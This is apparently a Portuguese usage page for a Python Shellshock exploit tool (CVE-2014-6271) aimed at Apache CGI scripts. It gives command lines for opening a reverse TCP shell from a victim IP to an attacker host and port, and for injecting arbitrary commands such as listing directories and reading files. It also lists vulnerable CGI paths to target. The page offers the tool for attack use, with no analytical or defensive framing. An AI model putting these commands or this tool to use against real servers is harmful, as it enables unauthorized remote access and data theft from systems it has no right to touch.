
[CVE-2014-6271] Ferramenta de Injeção Remota de Comandos Apache Shellshock para shell reverso rápido e navegação de arquivos
[CVE-2014-6271] Ferramenta de Injeção Remota de Comandos Apache Shellshock para shell reverso rápido e navegação de arquivos
Exploit remoto Apache Shellshock
Uso:
./Shellshock.py payload=reverse rhost=1.2.3.4 page=3 lhost=5.6.7.8 lport=1234
./Shellshock.py payload=files rhost=1.2.3.4 page=3 echo="ls -la"
./Shellshock.py payload=files rhost=1.2.3.4 page=3 echo="cat file.txt"
Variáveis:
Vítima:
rhost => IP da vítima
rport => PORTA da vítima
Atacante (Para shell reverso):
lhost => IP do atacante
lport => PORTA do atacante para shell reverso
Echo:
echo => Comando personalizado a injetar
Exemplos:
echo="ls -la"
echo="cat file.txt"
Config:
pages => Páginas CGI vulneráveis específicas
Páginas exploráveis:
[0] /cgi-sys/entropysearch.cgi",
[1] /cgi-sys/defaultwebpage.cgi",
[2] /cgi-mod/index.cgi",
[3] /cgi-bin/test.cgi",
[4] /cgi-bin-sdb/printenv
Payloads:
"reverse" => (unix universal) Shell reverso TCP (Requer: rhost, lhost, lport)
"files" => Ler e navegar por arquivos (Requer: rhost, echo)
Criado por Filip Studený